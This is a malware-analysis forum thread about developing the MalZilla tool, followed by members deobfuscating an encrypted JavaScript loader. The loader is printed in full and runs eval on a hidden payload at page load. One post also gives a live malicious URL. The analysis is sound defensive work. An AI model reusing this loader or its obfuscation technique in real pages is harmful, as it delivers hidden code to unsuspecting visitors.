Malware Domain List
Malware Related => Tools of the trade / Internet News => Topic started by: JohnC on August 19, 2007, 01:06:20 pm
-
Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. MalZilla is a useful program for use in exploring malicious pages. It allows you to choose your own user agent and referrer, and has the ability to use proxies. It shows you the full source of webpages and all the HTTP headers. It gives you various decoders to try and deobfuscate javascript aswell.
It was previously released only as a private beta, but has now moved to a public beta stage. You can download MalZilla at the MalZilla sourceforge page here (http://malzilla.sourceforge.net/).
There is a guide for using MalZilla made available here http://malzilla.sourceforge.net/tutorial_01/index.html
-
Malzilla updated to 0.9.2
Also a new tutorial in Documents section.
http://malzilla.sourceforge.net/
-
I apologize, 0.9.2 was a broken release :(
Fixed and uploaded as 0.9.2.1
The download mirrors will be updated (hopefully) in one hour.
-
Anyone willing to translate Malzilla to other languages?
I'm preparing next release, and I would like to include a couple of translations with the release.
There is some 200 strings to translate. Unicode is supported, so one can even translate to Chinese or Arabic.
Translation tool is also available.
I'm still polishing the interface, so the string list is still not complete, but if anyone applies for translating, I would prepare the list in ~10 days.
-
I'll try my best to get an exact translation for Greek,
whenever you think the strings' list is ready,pass it over... :)
-
I apologize for late reply.
I have uploaded a 0.9.3 pre-release on http://malzilla.sourceforge.net/
Please try to play a bit with translation, and tell me if buttons/labels are big enough for the translated text to fit in.
If not, I would need to play a bit with buttons size or with font size.
Translator folder contains a basic translating tool. It is still not polished, as it shows the resource numbers, but I've coded it today and didn't have time to make it better.
The uploaded default.lng is also done in hurry, it does not contain the messages and dialogs, but it is good enough to test the interface/GUI translation.
-
Thanks, Bobby!
Do you prefer if we post bugs & suggestions here or on the sourceforge forum? I've already found a few in 0.9.3pre.
TJS
-
Thanks, Bobby!
Do you prefer if we post bugs & suggestions here or on the sourceforge forum? I've already found a few in 0.9.3pre.
TJS
Hi TJS,
I check both forums every day, so both are equally good for posting bugs & suggestions.
regards
bobby
-
chinese_simply language ready! ;D
mailed to u, bobby~
-
Lol,jimmyleo...was it that easy doing it under chinese?What's your secret? :)
Damn it...'cause I've run into quite a bit of trouble doing this for greek,
not only I couldn't find the equivalent technical terms,
but the resulting boxes should be huge afterwards...I'll see what can be done... :-\
-
hi sowhat-x,
I only couldn't found "find" resource ID in "decoder" tab...
and some of them should be wider for better presentation.
I translated most of them, and only little hasn't been translated.because they are reseved in Chinese.
and some of technical names which I know maybe my FreShow experience :P
-
Hello Bobby,
Here are some issues and suggestions inspired by your latest pre-release of malzilla.
Update version number not in sync (reads 0.921 instead of 0.9.2.1)
Clipboard doesnt work properly (on vista)
- functional but throws an error
- locks clipboard in other apps [this is annoying]
- Suggestion: clipboard feature disabled by default
Regression from previous version url no longer opens without http or www
- Suggestion: add support for hxxp, default to http for protocol and support non www.* links (ex. blah.com)
Suggestion: Option to enable/disable hilighting
Suggestion: Option to hide/show comments (<!-- -->) [some obfuscation puts them everywhere]
Hex viewunder download tab is agreat idea-- what's the point of the 'hex view' tab?
Thank you very much for your hard work on this great utility!
tjs
-
@jimmyleo
This pre-release was just a test to see how the translating engine is working. There is more strings missing in that default.lng file.
I will release a complete list at the moment we know which features will get into 0.9.3 release.
@TJS,
About the minor issues:
====
- version number does not matter at the moment as long as you know if you have the newest version. You see, there is a HTML file on the Malzilla's site that contains a string with current version number. I can convert a string to float, and compare it with a number stored as variable in Malzilla. Thats how it is done, and thats why the version is stored as 0.921 (float, floating point number).
If I would like to report it in the form of 0.9.2.1 I would need to write a parser and extra code for comparing these version numbers. I'll keep it simple for now.
====
- about URLs and annoying messages - I did try to prevent the user to enter FTP or HTTPS URLs, as the Malzilla gets stuck for a long time if one is entered. Malzilla does not support these protocols, neither it will support.
I'll code it in different way, as it is really annoying as it is.
===
- Enable/Disable Highlighters - will be done. If I get enough time I'll also make them configurable (select colors the way you like).
====
- Hex View under Download tab is just an experiment. I wanted to see how useful/useless it can be. Let the both Hex Views stay where they are, and we will see in the next release which one is for TrashCan.
About the major issues:
====
- Clipboard monitor is really a pain. It is useful if you copy a long list from some forum/site, but it is a pain as it also gets triggered at internal copy/paste in Malzilla.
Also, there is some bug (not in my code, maybe Delphi or Windows) that triggers the Clipboard Monitor twice for each URL on the clipboard. Thats why it clears clipboard after URL is detected and pasted to the list.
Hmmm... I was thinking that I solved that locking of Clipboard for other applications (in the fact - clearing the clipboard, not really locking).
I will get back to this Clipboard Monitor latter, I have some more important thing to do first.
Can you give me some info which error it triggers on Vista? I do not have Vista, all is done on XP (half-working Linux version is also there)
====
- Hide comments - this one will need some coding. See my list of priorities (follows in this post).
ToDo list:
====
Lately I see a lot of scripts using arguments.calee().toString in a way which obviously gives very funny results in Malzilla.
(I guess all of you already knows this, but...) arguments.calee().toString differs between SpiderMonkey (Mozilla, FireFox, Malzilla...) and Internet Explorer.
As I see, a lot of scripts I'm seeing lately are using this in the way that is making the script "IE-only".
I already know what to try, I just need some time to test my idea.
====
History/Log/Case - no, that are not 3 options needed, it is just one feature. I received a request of keeping tracks what and how was something done and to group things in something like a Project/Case.
Guess I'll do it in the form of a button "Start/stop logging", where every action will be recorded (URLs, HTML content, decoded content etc. etc.). I think this would be very useful feature.
====
More Download tabs (something like tabbed browsing in FireFox). Well, it sounds complicated to me to have unlimited number of tabs (a looooot of coding needed, and there is a danger of memory leaks), so I'm thinking about having some 5 (or say 10) Download tabs that the user can open.
btw. did someone already saw the debugger? :) (just type some nonsense in Decode tab, and try to run the script)
It wasn't intended to be there in this pre-release, but I forgot to disable it before doing the upload.
Unfortunately, you got half-backed debugger, as some options were disabled.
This debugger is not my code, it is part of the wrapper I use to access SpiderMonkey, but it seems that nobody from the team who published the wrapper knows how to use/access this debugger from the program code (I asked on the mailing list), so I'm on my own here.
-
I just did some testing on XP and noticed that the clipboard issue occurs here too. When I click 'send script to decoder' in the text tab, I occasionally get an error from malzilla saying it cannot open the clipboard. On vista, I get this error when I start the application sometimes as well.
As for the debugger, I like it, but I think it should be integrated as another tab instead of a popup... Specially because it's not always useful (particulary when you have multiple nested obfuscated scripts). In many cases it throws errors about 2nd degree script variables not being defined, even though the obfuscation is properly decoded in the decode tab. I'd rather not have to close the debugger every time I run a script.
Maybe you can make the debugger configurable (whether to use it or not)...
Also, a random point, I HIGHLY recommend that you set 'clear cache on exit' as default. The cache is usually full of malware and AV scanners hate it.
TJS
-
@tjs
I just changed the code for Send script to decoder. It does not use Clipboard anymore.
About errors with Clipboard, I didn't have any of them here, so I have no idea whats wrong. Maybe it is a conflict with some software you use on both XP and Vista.
As for debugger - it is external code, programed in a such way that it can't be so easy transformed into another tab.
Only thing I can do is a checkbox 'debug', where you can chose to use debugger or not, or a separate button for debugging.
As for Clear cache on exit - I can do it if you prefer so. I prefer not to clear the Cache, and I do not run any AV on this PC (with some 50GB of malware on my HDD, AV would go crazy).
-
Debugger:
I like the idea of a seperate button or control to decide whether or not to use the debugger.
Cache:
I understand your point. I also don't run any AV scanners on the machines that I do analysis on. I just don't see the value of persisting the cache between sessions. It's not like the performance tradeoff is that valueable anyway (I don't mind if you have to redownload pages every time- after all, we're looking for malware, not browsing the web).
Clipboard:
I'll investigate further, but i'm not really running anything unusual on either of my analysis machines. Maybe I'm infected with something that is hooking the clipboard ;)
TJS
-
No problem. When the full-string is ready, just mention me.
and about the Clipboard Monitor problem. I've came across it sometimes under Vista. Just as click "send to decoder" popups "can't open clipboard".
debugger is a bonus originally. ::) I found it in one analysis condition.
I also recommend that clipboard feature disabled by default. because when I use other tools it made me confused.
best regards,
jimmyleo
-
I'm running into a new issue with 0.9.2.1pre
I constantly paste URLs without www or http by mistake (usually IP based) causing Malzilla to throw the malformed URL msgbox, but today while trying the following IP, I got a new error:
(X) Access violation at address 004eba13 in module malzilla.exe. Read of address 00000000
Can anyone else repro this bug?
208.72.168.176/e-Z1odey0312/index.php
Thanks,
TJS
-
Did there was anything on that address at the time you try it, or it was a 404 error page?
If there was some content, can you please upload it for me to test it?
I did have some Read of address 00000000 errors while trying to integrate the debugger.
All the errors were related to the package I use for dealing with Unicode strings:
http://mh-nexus.de/tntunicodecontrols.htm
so, not really my fault, but I can at least do something to prevent the Malzilla's crash if I can localize the error you got.
-
...only 1 request here...what jimmyleo already said about clipboard monitor being disabled by default:
copy/pasting http addresses in the 'URL' box has caused me a quite a bit of trouble in occasion,
i think it happens sometimes when an address is already filled there,
and someone tries to copy/paste a partial address there (without the http prefix),
not sure,I'll have to dig a bit more to check exactly when this happens (under v0.921) :(
And the clipboard monitor feature in 0.93 beta makes it quite a bit more confusing... :P
-
http://rapidshare.com/files/92273310/malzilla.zip.html
Please test the changes I made.
I will drop Clipboard Monitor in the future. I'll try replace its functionality in some other way.
-
Ha-ha -> less than 16 minutes...this must be the fastest bugfix response I've ever seen! ;D
Yeap,at least under a first quick glance,copy/pasting urls in this build,
seems to be working in a much better and simpler way... ::) :)
-
Grrrr....
Take a look at the script in the attachment (pass= infected).
It is a modified Caesar cipher, that means trivial, but...
The decryption key is created on the fly, and it depends on the function length (arguments.calee thing).
The function is full with redundant operations and variables (used nowhere), just to make the analyst mad.
That is the kind of script I mentioned a couple of posts ago:
ToDo list:
====
Lately I see a lot of scripts using arguments.calee().toString in a way which obviously gives very funny results in Malzilla.
(I guess all of you already knows this, but...) arguments.calee().toString differs between SpiderMonkey (Mozilla, FireFox, Malzilla...) and Internet Explorer.
As I see, a lot of scripts I'm seeing lately are using this in the way that is making the script "IE-only".
I already know what to try, I just need some time to test my idea.
Can someone help in deciphering this?
I would like to include decoding for such scripts in Malzilla.
If anyone is interested, I would like to share my findings.
Last night I tried to write a PScript for brute-forcing it, but PScript misses a lot of functions I need for this.
If I get some time today, I'll try to code one brute-forcer for this (EXE, not script).
-
I'm working on analyzing the script right now (finally, something I might know how to do! :)), but I just wanted to point out if you just wanted to find out what it is that the function is running, you can take a glimpse at the very end:
eval(h8TbWsRTn);}It's going to run whatever is in the h7TbWsRTn variable (this is after it's been decrypted). Instead, we can modify the code to just print it out to the screen:
document.write(h8TbWsRTn);}But, this doesn't come out clean:
elkMvmrl�Cc_Sn;fri%QJp[LR:G.+y_q�^0f7f36<`'cvjsl\k^u2f_kcbO0xrQsifXi,,,q\mVcgh&.ST�i0*%(%qYWtscq:^]g,,9uXo s5:a0GM2S?y_q�A!m67KtNC%xeu�f[4]89|3n4^0f7f36<`�niqes_8`cv#_d-U"wf{K:m^\"qYOQak.vx@%&2sKt${06je,7Lj;m\t Cvu_x�&%hsu&C.h�6QxUE4-%F;n03DrAH@5352A!m67KtNC�--{06je,7LjYC.h�6QxUET:�=zdp�h.!e5SNGH:�=jrp';4U48PsV=:�4<>B6b/�OyZD:;4U48PsV=;(?5,�zh.!e5SNGH:�s5:a0GM2SBA<0 [�*u45b(M:JU)/(60#:<571*5�<4,9efo�kPJj4HLOYA39hCDV7URcV3/�8?lJFc2;QiZ)<;4U48PsV='�+$~v1.pRD9KeZ`I1n9TMdN(.9o52LlT0_A+v1.pRD9KeZ`I1n9TMdNZHs5:a0GM2S->ge�%b4;vfA,EQ]mOEk,N9g[.B6b/�OyZD\�9 2-#yw)4]jF8FfRf6Ip8ON\T�F;n03DrAHa.;3)6�;::08-8gdc5O5_d|P;3)6�;::08,8Pqv+o0.`�RTKO<'8[3;f/OGE;>kg5r-2c7s>o0.`�RTKO*"&eci9V7l_bOA{06je,7LjY'Xb Z\te|&(2sKt$jb6j3�{9r;`\3B:yevL%iOpkwf:]l\*H:i1+J_YJ@.:;4U48PsV=9"=H:i1+J_YJ.)(�x`cv#Fb(-�G|56<^a!u:8w4f(.9o52LlT0=jwS1Zt�LT^B6b/�OyZD\4.%hxX0bn14R_G5j)17w[I[<'8`cv#BAD@O2X53:m^\"LpOAX_Ns:>t`i�;zLPaw_0�=kg5r-2c7s@eGcU8UGMB-cbXixk9PoE7e|k114dN9w93x,l%XTvR3>4=nA4/1*8@RwW2F.PV?U{FLZuR56>dni%.9o52LlT0?4>B6b/�OyZD;^a!u:8w4f8.9o52LlT0-A5'zm^\"{\1G[cAyk@eGcU8UGMB-jrLuxu&C.h�6QxUE#/�=HEKB\->49@n`ipOKrw&vP02fjZuf#. +?KkP9^Lfu9;C9J-g4W04$c^:EDo2FeEQWoMG+2X:a>ge�EWSFd`ch3&2-#yGdN,cfgo54EWSFd`ch3�4999|dS;TnqBsk('Uxugm^+PtspAgXo-qhh&GdN,cfgo5 8;zLPaw_0�-/>TOjQ�I;Vj<*5#3?ld'FPVQL73m/9Pv4=nA4.8)8PvY5av+G:]H:i1+J_YJ`;1'8g"ioqd�x9UpRF3,k"?4>TOjQ�I;Vj<;4U48PsV=8giy_k�j@SVmlCkq�= JelNT:lvp'�0P6G7_`/6KC882A04P;4E56/30;i<35*3086d3@(6Mc;d/@/^�d:9D8,>,;;<3A.6!:;db8.> ;;D0a.2K88e28,>,;fD2a.2�8F:a2]1�5j6C3Z^":j;d@/408<75,2O86916:6Kc<<38-6�D8d_`)>.788B6\0P6G7_@/5 :4D?703"ciD05'>-;;d67+> D:e1896,c;d6`/2+88e2@+6-789.5*2�:5e35=3,89976.3�9;:1504�8F8?A,3P9::05/3K8;9?683#9;:34/^�8j936-3K9::5593#8F9A6,2"d4:c5,3/899B6.3 99:25.20;<6aZ3�C7e/@)6Oc4<67-6+cfDB8-3�c<;/8(>":<:58<6K7F9D4'0M)->
So right now I'm looking at the code to see how it is actually working. It'll take a tiny bit longer than normal, since I have to look up certain syntaxes for things that the writer used that are ridiculous ("variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);") and I still don't fully understand how the deprecated .callee function works.
Anyway, first I'm just cleaning up the code. I'm posting each step in case I make a mistake, someone else can catch it and carry on their own work from there or something.
Step 1: Get syntax back and make it look "clean" (indentation, spaces, etc)
<html>
<script language="JavaScript">
<!--
function nlR1sYAdQ (dp58428V3) {
var m6K3yhq2K=arguments.callee.toString().replace(/\W/g,'').toUpperCase();
var A7ck1Wh8H;
var B2t331TL0;
var NisOkeH61 = m6K3yhq2K.length;
var Xn47RT3Sm;
var h8TbWsRTn='';
var PkKX3bWF0 = new Array();
for (B2t331TL0 = 0; B2t331TL0 < 256; B2t331TL0++) {
PkKX3bWF0[B2t331TL0]=0;
}
var A7ck1Wh8H = 1;
for (B2t331TL0 = 128; B2t331TL0; B2t331TL0 >>= 1) {
A7ck1Wh8H = (A7ck1Wh8H>>>1)^((A7ck1Wh8H&1)?3988292384:0);
for (i5G3CC1F6=0; i5G3CC1F6 < 256; i5G3CC1F6 += (B2t331TL0 * 2)) {
PkKX3bWF0[i5G3CC1F6 + B2t331TL0] = (PkKX3bWF0[i5G3CC1F6]^A7ck1Wh8H);
if (PkKX3bWF0[i5G3CC1F6+B2t331TL0] < 0) {
PkKX3bWF0[i5G3CC1F6 + B2t331TL0] += 4294967296;
}
}
}
Xn47RT3Sm = 4294967295;
for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
}
var eXK5vvK0K = new Array();
var Y37iVA85C = 2323;
Xn47RT3Sm = Xn47RT3Sm^4294967295;
if (Xn47RT3Sm < 0) {
Xn47RT3Sm += 4294967296;
}
Xn47RT3Sm = Xn47RT3Sm.toString(16).toUpperCase();
var sNImKPP0N = new Array();
var NisOkeH61 = Xn47RT3Sm.length;
for (B2t331TL0=0; B2t331TL0 < 8; B2t331TL0++) {
var LS0E1DrB3 = NisOkeH61+B2t331TL0;
eXK5vvK0K[B2t331TL0] = 1;
eXK5vvK0K[B2t331TL0] = Y37iVA85C;
if (LS0E1DrB3 >= 8) {
LS0E1DrB3 = LS0E1DrB3 - 8;
sNImKPP0N[B2t331TL0] = Xn47RT3Sm.charCodeAt(LS0E1DrB3);
} else {
sNImKPP0N[B2t331TL0] = 48;
}
}
var vM4s1CVcM = 0;
var ahE3xpv6w;
var L3KsBg108;
var v65y6Hs6a;
NisOkeH61 = dp58428V3.length;
v65y6Hs6a = NisOkeH61;
Y37iVA85C = 1123;
Y37iVA85C = v65y6Hs6a;
for (B2t331TL0 = 0; B2t331TL0 < NisOkeH61; B2t331TL0 += 2){
var QgQRdYhu8 = dp58428V3.substr(B2t331TL0, 2);
ahE3xpv6w = parseInt(QgQRdYhu8,16);
L3KsBg108 = ahE3xpv6w - sNImKPP0N[vM4s1CVcM];
if (L3KsBg108 < 0) {
L3KsBg108 = L3KsBg108 + 256;
}
h8TbWsRTn += String.fromCharCode(L3KsBg108);
v65y6Hs6a++;
Y37iVA85C = 3891;
if (vM4s1CVcM < sNImKPP0N.length - 1) {
vM4s1CVcM++;
Y37iVA85C = 1092;
eXK5vvK0K[B2t331TL0] = 20;
} else {
vM4s1CVcM=0;
Y37iVA85C=B2t331TL0;
}
}
eval(h8TbWsRTn);
}
//-->
</script>
<body onLoad="nlR1sYAdQ('AAae9e93b79EA8A3648596a5949f719DB7ab58978BA19183977C7A746Cb0af96B6599176a7689c6a7b7e936Da4a7a0aab19E9EA4b6639C96b0A5959571a9A888B8AB999Eaa5d6263b69EA09cA4989e5d7395875faa61605c6d67A49F98A5a99Ab67C91a3A85D6270ba9aa250B4667098758980789470AF96b6597467ae676d82B990766Bb996ab55ab9d67a3796ab26Ab3769176a7689C6a7B7E935EAF9AA79cB8A16BA6A4a75996a96f8868B897B1827fAF91A263a28F8696a39E74B7a9765C6B74a691b555B1677BAC9872787DA072B29ea75084a7AB96bd61596bA9a4AB5d88709B627782ae8C8A76606b876ca4677886A58789716b6A7A747467AE676d82B990765B6e5eb1677BAC9872787da09088709B627782ae8C8a966D607EAB9AA764AA6167a66689858c8a6d617E9ba8a76C7D679B756986AA9B7F6D61756d74797Ba4626490aa907b7F7d679b756986aa9B7F6E6e80666255BFAA6167A66689858c8A6d58b4667098758980789473777375628e586Ba66A6cA76A80808B865f666D7863697B6D6b6e766C68647d656270aaA8A258AC8180a1798a7f959a726970AD85779c7886889a9B7562657970A2818Ba56581929A9060817d679b756986aa9B7F5a626C55b4AD7670A398856a819C9fa27c77AF6a8A84A9905b747aa06b6991ae8776a07261AD7670A398856a819C9fA27C77AF6a8A84a9908d8Eb466709875898078945e749eaa5958A8756CAC9D866e78979E9e857Cb06e817fA88C64797bA4626490aa907BA1596C50735e59B0bc6B67A3AB776E7DAB94997c8Aa16E86939E875B876Ca4677886a58789926472786B69647c6b70677d6F6BADC0b29a9A7a9168A5a5ad8672786b69647C6b70677d6E6B96B2a761A6757093619385818681696bA1746c9c66948978817f9C9d6cb76F65a978A474A675709361938581866f6459ABA49A6F8d7CAE92A89072b1677bac9872787DA0906C9a95669b6dAE97bc868e9189996C98797075937198A196b67C9f94a876AD5DB56A67937485897D95625956756a6E92a2615891a86B916db99ba87d8173715E6A6a66677a6c6B6679626bADB996AB55AAad8562A6AC6d7F94769E95ba557AA7b69aA9586c70af96B6598680b6896D7C7b8c9C6d75686B687F9A95669B6dAE97BC866D91a86B916DB99ba87da1696B6e78726667756e6e70AD9F5058A49a6f8d7CAE92A89071695e64B49195798D71aaa6b17d5B80696b6E78726667756e6F70C19A95669b6dae97BC866d91A86B916DB99bA87D71A9a888B8ab999Eaa5d6a6B6D67A49F98A5a99aB67c91A3a85d6270ba9AA250A9A9717685aa637FAB72A79aBB5971a2b596B25D6D74a691B555a0997bAC6665BC6aA872a59e66887bAA9bAD91679C95b19cAD9D7F9F9fa26b7970A0766d7dA59a7b76657f7d679b756986aa9b7F6c687E7970A0766D7DA59a7B64606D59aba6a4a7597Da76A606288AD6B6d81A09467b66b6eAE79a85b747Aa06B6991AE87767E9Bad8A769Ca7648d8594797BA4626490aa907ba176616BA9a98e67a7b0647A93907D6Caf6B647dB88C7F92818F80A39769806c97a56B99A955617Da76a606288AD6B6d8276685963b0819875696275bb6771728c9c6160757Ab1677C66686Ba9a9717685AA637fAB907D6caf6B647dB88C7f92819A95669b6dae97BC865E93ab96AB78b39D9571b75d819875696275bb67715E7fB65095AFa89e55BF9FA4688476AA6893a18B747Aa06b6991AE8776a0726d6D7Fb6ada6a4a7598497A57F78776aA76D81696BA6A4a759798686739573896B6a7FAF91A2637dA686869a9294b46B74abA5ab5081bb7d8698BCA163627e9C9d6cb76f65A978a4769c8cA5887e9678837972A5959EAAA9A17095B1787Da6adA168767697947AA86F6Abd6e9f6b9985AC8978806783AF726a66766c6b8693A88D698b70839C8086b17d919ca8987667749BB3AB58747aA06b6991ae8776806574797BA4626490AA907B80a09467b66B6Eae79a86b747Aa06b6991ae87766E726B5ebfaf91a263ac92688c9d9687BA9c769C8cA5887E9678837972ACa592B6A9ab5D88709B627782ae8C8a6562597E797B82879E6084756A76a5a5ABa3958cA3AD5DBB926378A79b90ACAB6561666c7081a2957B9192a7a66f72887b7d73A8658d67796696a47b767aA67788988B9288A5848C6d659e7B92749Eaa61789d94779A97A8aa666C735E59B08cA68172A4979dA67a76789D94779a97a8AA665B756A6f70C1a68681959fa779b8ad5B6D96A9ab9eB2A05E96B5A4a678ac9aa273b2999e5D8Ca68172a4979da67a626b81BB7d8698bcA163626e60748b94ac84648A6c8ca1816C68697470A29B6C88839C927D6d6Ab2716c96B76d7a76B56c7F9871A19Ea3ABad985d745e59B0938c9c7f8B696eA37c645B6B9985AC8978806783af726A657D6b6B96b78a6b98bb6d7A809e7970a0766D7dA59a7B967276696Bad639aA5a8a959AB7f96A1887d786e9E688065748b94ac84648A6c8CA1817d679b756986aa9b7f6badc09Aaf96B0619D869487A3a388adA4597eb24381aaAE819a7b9Daca76c60639677786D96A571699184696e69867267967C657b6C7b7166767c9A726a7A6c667679679a6a856a6993a46c9a6685719160a56B6F7B7d6e71727C6c726a867069677B6c9a997D7071667c6c7A67a670659179699B697d6E71727C977A69A670656479777098779F6463769B6C7A789c91687B9B719B85716776796d7a65856d6660856a7A6BA56F6771a46b9a6d866e6972A4699B6bA56f699578766e6ba59F6963A5659a6da57069717C6e726E7a6e659579676f687b7c6991a46D726a7d6F696585699A96A56B717478696e797B9E639677786d96857168667b657a767c726668A49a7a677A6971737C6C9a6D7c6d7166856b9b687D7b6972a46c9A6dA571657179699b69856D697378696F657A6C65647B669b6a7A7f6672796a6f6e7b7066637a6C70687a72676179776E76866e66967A6B70677A716691796C6f767B7A66697a6c706a79719161799B6F6a7B6f66917a6B706C7a7b666979776F787b6E6568A565709a7A6E6675796A6f797B7066667A6A70697A7065767c6D9A65a56d6969A4667a76796d666279796d66789D637677786D767D6F91687c6a9a6e86696967A5657b6a7a696972a466726da69c666084689B66856b6995A465726D7C6f6971A4977a797D6F6661a46D71667D6a71687B6d706c7D7e699178776F7B796963936A5E74')">
</body>
</html>
Step 2: Replace variable names with normal ones, and remove obvious redundancy
<html>
<script language="JavaScript">
<!--
function thefunction (parameter) {
var variable1 = arguments.callee.toString().replace(/\W/g,'').toUpperCase();
var i; // Used in for loops
var variable4 = variable1.length; // .lengths of various vars
var variable6 = '';
var array1 = new Array();
for (i = 0; i < 256; i++) {
array1[i] = 0;
}
var variable2 = 1;
for (i = 128; i; i >>= 1) {
variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);
for (j = 0; j < 256; j += (i * 2)) {
array1[j + i] = (array1[j]^variable2);
if (array1[j+i] < 0) {
array1[j + i] += 4294967296;
}
}
}
var variable5 = 4294967295;
for(variable2 = 0; variable2 < variable4; variable2++) {
variable5 = array1[(variable5^variable1.charCodeAt(variable2))&255]^((variable5>>8)&16777215);
}
var array2 = new Array();
variable5 = variable5^4294967295;
if (variable5 < 0) {
variable5 += 4294967296;
}
variable5 = variable5.toString(16).toUpperCase();
var array3 = new Array();
var variable4 = variable5.length;
for (i = 0; i < 8; i++) {
var variable7 = variable4 + i;
array2[i] = 1;
array2[i] = '';
if (variable7 >= 8) {
variable7 = variable7 - 8;
array3[i] = variable5.charCodeAt(variable7);
} else {
array3[i] = 48;
}
}
var variable8 = 0;
var variable10;
variable4 = parameter.length;
var variable13 = 3891;
var variable11 = variable4;
for (i = 0; i < variable4; i += 2){
var variable12 = parameter.substr(i, 2);
variable10 = parseInt(variable12, 16);
if (variable10 < 0) {
variable10 = variable10 + 256;
}
variable6 += String.fromCharCode(variable10);
variable11++;
if (variable8 < array3.length - 1) {
variable8++;
variable13 = 1092;
array2[i] = 20;
} else {
variable8 = 0;
variable13 = i;
}
}
eval(variable6);
}
//-->
</script>
<body onLoad="thefunction('AAae9e93b79EA8A3648596a5949f719DB7ab58978BA19183977C7A746Cb0af96B6599176a7689c6a7b7e936Da4a7a0aab19E9EA4b6639C96b0A5959571a9A888B8AB999Eaa5d6263b69EA09cA4989e5d7395875faa61605c6d67A49F98A5a99Ab67C91a3A85D6270ba9aa250B4667098758980789470AF96b6597467ae676d82B990766Bb996ab55ab9d67a3796ab26Ab3769176a7689C6a7B7E935EAF9AA79cB8A16BA6A4a75996a96f8868B897B1827fAF91A263a28F8696a39E74B7a9765C6B74a691b555B1677BAC9872787DA072B29ea75084a7AB96bd61596bA9a4AB5d88709B627782ae8C8A76606b876ca4677886A58789716b6A7A747467AE676d82B990765B6e5eb1677BAC9872787da09088709B627782ae8C8a966D607EAB9AA764AA6167a66689858c8a6d617E9ba8a76C7D679B756986AA9B7F6D61756d74797Ba4626490aa907b7F7d679b756986aa9B7F6E6e80666255BFAA6167A66689858c8A6d58b4667098758980789473777375628e586Ba66A6cA76A80808B865f666D7863697B6D6b6e766C68647d656270aaA8A258AC8180a1798a7f959a726970AD85779c7886889a9B7562657970A2818Ba56581929A9060817d679b756986aa9B7F5a626C55b4AD7670A398856a819C9fa27c77AF6a8A84A9905b747aa06b6991ae8776a07261AD7670A398856a819C9fA27C77AF6a8A84a9908d8Eb466709875898078945e749eaa5958A8756CAC9D866e78979E9e857Cb06e817fA88C64797bA4626490aa907BA1596C50735e59B0bc6B67A3AB776E7DAB94997c8Aa16E86939E875B876Ca4677886a58789926472786B69647c6b70677d6F6BADC0b29a9A7a9168A5a5ad8672786b69647C6b70677d6E6B96B2a761A6757093619385818681696bA1746c9c66948978817f9C9d6cb76F65a978A474A675709361938581866f6459ABA49A6F8d7CAE92A89072b1677bac9872787DA0906C9a95669b6dAE97bc868e9189996C98797075937198A196b67C9f94a876AD5DB56A67937485897D95625956756a6E92a2615891a86B916db99ba87d8173715E6A6a66677a6c6B6679626bADB996AB55AAad8562A6AC6d7F94769E95ba557AA7b69aA9586c70af96B6598680b6896D7C7b8c9C6d75686B687F9A95669B6dAE97BC866D91a86B916DB99ba87da1696B6e78726667756e6e70AD9F5058A49a6f8d7CAE92A89071695e64B49195798D71aaa6b17d5B80696b6E78726667756e6F70C19A95669b6dae97BC866d91A86B916DB99bA87D71A9a888B8ab999Eaa5d6a6B6D67A49F98A5a99aB67c91A3a85d6270ba9AA250A9A9717685aa637FAB72A79aBB5971a2b596B25D6D74a691B555a0997bAC6665BC6aA872a59e66887bAA9bAD91679C95b19cAD9D7F9F9fa26b7970A0766d7dA59a7b76657f7d679b756986aa9b7F6c687E7970A0766D7DA59a7B64606D59aba6a4a7597Da76A606288AD6B6d81A09467b66b6eAE79a85b747Aa06B6991AE87767E9Bad8A769Ca7648d8594797BA4626490aa907ba176616BA9a98e67a7b0647A93907D6Caf6B647dB88C7F92818F80A39769806c97a56B99A955617Da76a606288AD6B6d8276685963b0819875696275bb6771728c9c6160757Ab1677C66686Ba9a9717685AA637fAB907D6caf6B647dB88C7f92819A95669b6dae97BC865E93ab96AB78b39D9571b75d819875696275bb67715E7fB65095AFa89e55BF9FA4688476AA6893a18B747Aa06b6991AE8776a0726d6D7Fb6ada6a4a7598497A57F78776aA76D81696BA6A4a759798686739573896B6a7FAF91A2637dA686869a9294b46B74abA5ab5081bb7d8698BCA163627e9C9d6cb76f65A978a4769c8cA5887e9678837972A5959EAAA9A17095B1787Da6adA168767697947AA86F6Abd6e9f6b9985AC8978806783AF726a66766c6b8693A88D698b70839C8086b17d919ca8987667749BB3AB58747aA06b6991ae8776806574797BA4626490AA907B80a09467b66B6Eae79a86b747Aa06b6991ae87766E726B5ebfaf91a263ac92688c9d9687BA9c769C8cA5887E9678837972ACa592B6A9ab5D88709B627782ae8C8a6562597E797B82879E6084756A76a5a5ABa3958cA3AD5DBB926378A79b90ACAB6561666c7081a2957B9192a7a66f72887b7d73A8658d67796696a47b767aA67788988B9288A5848C6d659e7B92749Eaa61789d94779A97A8aa666C735E59B08cA68172A4979dA67a76789D94779a97a8AA665B756A6f70C1a68681959fa779b8ad5B6D96A9ab9eB2A05E96B5A4a678ac9aa273b2999e5D8Ca68172a4979da67a626b81BB7d8698bcA163626e60748b94ac84648A6c8ca1816C68697470A29B6C88839C927D6d6Ab2716c96B76d7a76B56c7F9871A19Ea3ABad985d745e59B0938c9c7f8B696eA37c645B6B9985AC8978806783af726A657D6b6B96b78a6b98bb6d7A809e7970a0766D7dA59a7B967276696Bad639aA5a8a959AB7f96A1887d786e9E688065748b94ac84648A6c8CA1817d679b756986aa9b7f6badc09Aaf96B0619D869487A3a388adA4597eb24381aaAE819a7b9Daca76c60639677786D96A571699184696e69867267967C657b6C7b7166767c9A726a7A6c667679679a6a856a6993a46c9a6685719160a56B6F7B7d6e71727C6c726a867069677B6c9a997D7071667c6c7A67a670659179699B697d6E71727C977A69A670656479777098779F6463769B6C7A789c91687B9B719B85716776796d7a65856d6660856a7A6BA56F6771a46b9a6d866e6972A4699B6bA56f699578766e6ba59F6963A5659a6da57069717C6e726E7a6e659579676f687b7c6991a46D726a7d6F696585699A96A56B717478696e797B9E639677786d96857168667b657a767c726668A49a7a677A6971737C6C9a6D7c6d7166856b9b687D7b6972a46c9A6dA571657179699b69856D697378696F657A6C65647B669b6a7A7f6672796a6f6